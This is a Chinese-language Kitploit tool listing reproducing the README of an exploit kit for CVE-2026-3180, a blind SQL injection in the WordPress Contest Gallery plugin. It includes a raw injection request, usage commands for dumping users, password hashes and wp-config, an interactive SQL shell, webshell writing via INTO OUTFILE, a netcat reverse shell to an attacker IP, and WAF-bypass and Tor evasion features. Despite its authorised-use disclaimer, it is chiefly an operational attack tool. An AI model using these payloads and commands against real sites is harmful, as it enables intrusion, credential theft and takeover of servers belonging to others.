Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
WP-Contest-Gallery-28.1.4-Exploit — CVE-2026-3180 的完整利用工具包——WordPress Contest Gallery SQL注入漏洞。具备自动数据提取、WAF绕过、反向Shell、SQLMap集成、Burp扩展生成及报告功能,适用于渗透测试与安全研究。 | Kitploit
工具/GitHubGitHub/cerberusmrxi/wp-contest-gallery-28.1.4-exploit
密码破解漏洞扫描器漏洞利用Web应用程序漏洞利用WAF绕过渗透测试Payload 开发
GitHubcerberusmrxi/wp-contest-gallery-28.1.4-exploit

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

WP-Contest-Gallery-28.1.4-Exploit

CVE-2026-3180 的完整利用工具包——WordPress Contest Gallery SQL注入漏洞。具备自动数据提取、WAF绕过、反向Shell、SQLMap集成、Burp扩展生成及报告功能,适用于渗透测试与安全研究。

查看仓库
11192个月前尚未审核
⚠️ 测试中
此PoC正在积极测试和完善。功能可能在不同版本之间发生变化。

CVE-2026-3180

WordPress Contest Gallery — 未认证盲SQL注入

Python Version CVSS License Platform

CVE-2026-3180的概念验证评估工具
作者:Sudeepa Wanigarathna · 原始发现:cardosource


[!重要] 仅限授权使用。 此工具仅用于安全研究、教育和测试您拥有或获得明确书面许可的系统。未经授权访问计算机系统是违法的。作者不对滥用行为承担任何责任。


目录

  • 概述
  • 漏洞详情
  • 功能特性
  • 安装
  • 快速开始
  • 使用指南
  • 命令参考
  • 注入技术
  • WAF绕过
  • 数据提取
  • 集成
  • 攻击链
  • 输出与报告
  • Docker
  • CI/CD集成
  • 故障排除
  • 仓库结构
  • 版本历史
  • 免责声明
  • 作者与致谢

概述

CVE-2026-3180 是 WordPress Contest Gallery 插件中的一个高严重性、未认证的盲SQL注入漏洞。该漏洞存在于 post_cg1l_resend_unconfirmed_mail_frontend AJAX 处理器中,cgl_mail 参数在未经过适当清理的情况下被传入 SQL 查询。

本仓库提供了一个功能丰富的 Python PoC(v2.0),供授权的安全专业人员进行漏洞影响验证、WordPress 数据提取、报告生成,以及与行业标准工具(SQLMap、Burp Suite、Nuclei)的集成。

wp

漏洞详情

属性值
CVE IDCVE-2026-3180
CVSS7.5(高)
攻击向量网络 — 未认证
影响机密性泄露、数据库读取、凭据窃取
受影响产品WordPress Contest Gallery 插件
受影响版本28.1.4及更早版本
漏洞类型盲SQL注入
数据库管理系统MySQL / MariaDB

受影响端点

字段值
URL/wp-admin/admin-ajax.php
方法POST
动作post_cg1l_resend_unconfirmed_mail_frontend
漏洞参数cgl_mail

概念验证请求```http

POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example Content-Type: application/x-www-form-urlencoded

action=post_cg1l_resend_unconfirmed_mail_frontend &cgl_mail=qualquer'OR/**/1=1#@teste.com &cgl_page_id=1 &cgl_activation_key= &cg_nonce=%20

### 参考资料

- [CVE-2026-3180](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3180)
- [Exploit-DB 52609](https://www.exploit-db.com/exploits/52609)
- [原始分析文章 (cardosource)](https://dev.to/22l31on/wordpress-contest-gallery-plugin-vulnerability-2ff6)

---

## 功能特性

### 核心利用

| 功能 | 描述 |
|---|---|
| 漏洞检测 | 布尔型、时间型、报错型、联合查询及堆叠查询测试 |
| 盲注提取 | 通过布尔推理进行二分查找字符提取 |
| 全量数据导出 | 用户、数据库元数据、选项、插件、主题、文章、表 |
| 交互式 SQL 终端 | 对后端执行任意 `SELECT` 查询 |
| wp-config.php 提取 | 针对常见路径的 `LOAD_FILE()` 尝试 |
| 反弹 Shell | 通过 `INTO OUTFILE` / `DUMPFILE` 写入 PHP Webshell(允许时) |

### 规避与性能

| 功能 | 描述 |
|---|---|
| WAF 绕过 | 15 种以上编码与混淆技术 |
| 多线程 | 可配置的工作线程数以加速提取 |
| 限速 | 请求间可配置延迟 |
| 重试机制 | 针对瞬时故障自动重试 |
| User-Agent 轮换 | 每次请求随机生成浏览器指纹 |
| 代理支持 | HTTP/SOCKS 代理及 Tor (`socks5h://127.0.0.1:9050`) |

### 报告与集成

| 功能 | 描述 |
|---|---|
| 报告生成 | JSON 和 HTML 格式的报告,包含提取摘要 |
| SQLMap 集成 | 自动生成含 tampers 的 SQLMap 命令 |
| Burp Suite 扩展 | 生成器 + 独立 `burp_contest_gallery.py` |
| Nuclei 模板 | 用于批量检测的 YAML 模板 |
| Metasploit 模块 | Ruby 辅助模块 (`contest_gallery_sqli.rb`) |
| Shell 自动化 | 基于 curl 和 SQLMap 工作流的 Bash 脚本 |

### 运维

| 功能 | 描述 |
|---|---|
| 彩色 CLI 输出 | 带严重级别的结构化日志 |
| 进度追踪 | 实时指标(请求数、耗时、提取速度) |
| 安静 / 冗长模式 | 适用于脚本编写与调试 |
| 信号处理 | 按 `Ctrl+C` 时优雅清理 |
| Docker 就绪 | 容器化部署支持 |
| CI/CD 流水线就绪 | 自动化用的退出码与 JSON 输出 |

---

## 安装

### 先决条件

- Python **3.8+**
- `pip`
- 对被测目标的可达网络

### 可选的外部工具

| 工具 | 用途 |
|---|---|
| [SQLMap](https://github.com/sqlmapproject/sqlmap) | 自动化 SQL 注入 |
| [Burp Suite](https://portswigger.net/burp) | 手动测试及扩展托管 |
| [Nuclei](https://github.com/projectdiscovery/nuclei) | 模板化扫描 |
| [Hashcat](https://hashcat.net/hashcat/) | 离线哈希破解 |
| [Tor](https://www.torproject.org/) | 匿名路由 (`--proxy tor`) |

### 设置```bash
git clone https://github.com/CerberusMrXi/WP-Contest-Gallery-28.1.4-Exploit.git
cd WP-Contest-Gallery-28.1.4-Exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 cve-2026-3180.py --help

依赖项

必需(运行时):```text requests>=2.31.0

**推荐 (来自 requirements.txt):**```text
colorama>=0.4.6
tqdm>=4.65.0
pyyaml>=6.0
python-dateutil>=2.8.2
urllib3>=2.0.0

该主要利用仅使用Python标准库以及requests。其他包可增强输出和报告功能。


快速开始

将 http://target.example 替换为实验室或授权目标。

检查漏洞```bash

python3 cve-2026-3180.py http://target.example --scan

### 完全利用(检测+提取)```bash
python3 cve-2026-3180.py http://target.example

导出 WordPress 用户```bash

python3 cve-2026-3180.py http://target.example --dump users

### 交互式 SQL shell```bash
python3 cve-2026-3180.py http://target.example --sql-shell

生成HTML报告```bash

python3 cve-2026-3180.py http://target.example --report html -o assessment.html

### 通过 Burp 代理```bash
python3 cve-2026-3180.py http://target.example --proxy http://127.0.0.1:8080 -v

使用指南

仅漏洞扫描```bash

python3 cve-2026-3180.py http://target.example --scan

运行布尔型、基于时间的和基于错误的检测,而不进行完全提取。

### 完全数据提取```bash
python3 cve-2026-3180.py http://target.example --dump all

提取数据库信息、用户、选项、插件、主题、文章、表以及系统元数据。

选择性转储```bash

python3 cve-2026-3180.py http://target.example --dump database python3 cve-2026-3180.py http://target.example --dump users python3 cve-2026-3180.py http://target.example --dump config python3 cve-2026-3180.py http://target.example --dump options python3 cve-2026-3180.py http://target.example --dump plugins python3 cve-2026-3180.py http://target.example --dump themes

### 交互式 SQL 外壳```bash
python3 cve-2026-3180.py http://target.example --sql-shell

请提供需要翻译的Markdown内容。```text sql> SELECT DATABASE() wordpress

sql> show users [ { "username": "admin", "email": "[email protected]", "password_hash": "$P$B..." } ]

sql> show tables ["wp_users", "wp_posts", "wp_options", ...]

sql> exit

**Shell 命令:**

| 命令 | 描述 |
|---|---|
| `SELECT ...` | 执行 SQL 查询并打印结果 |
| `show users` | 显示缓存的已提取用户 |
| `show tables` | 显示缓存的表列表 |
| `show database` | 显示缓存的数据库元数据 |
| `show config` | 如果已提取则显示 wp-config.php |
| `show options` | 显示 WordPress 选项 |
| `show plugins` | 显示已激活的插件 |
| `help` | 列出可用命令 |
| `exit` / `quit` | 退出 shell |

### 报告生成```bash
# JSON report (default, saved to reports/)
python3 cve-2026-3180.py http://target.example --report json

# HTML report with custom filename
python3 cve-2026-3180.py http://target.example --report html -o reports/assessment.html

反向 Shell (仅限授权实验室使用)```bash

Terminal 1 — listener

nc -lvnp 4444

Terminal 2 — exploit

python3 cve-2026-3180.py http://target.example --reverse-shell 10.0.0.5 4444

> 需要 `FILE` 权限、可写的 webroot,以及 `secure_file_priv` 不阻止目标路径。

### SQLMap 命令生成```bash
python3 cve-2026-3180.py http://target.example --sqlmap

或者使用捆绑的自动化脚本:```bash chmod +x sqlmap_automation.sh ./sqlmap_automation.sh http://target.example

### Burp Suite 扩展```bash
# Generate extension from exploit
python3 cve-2026-3180.py http://target.example --burp-extension

# Or load the standalone extension
# Burp → Extender → Extensions → Add → Python → burp_contest_gallery.py

Nuclei 模板```bash

python3 cve-2026-3180.py http://target.example --nuclei-template

下载工具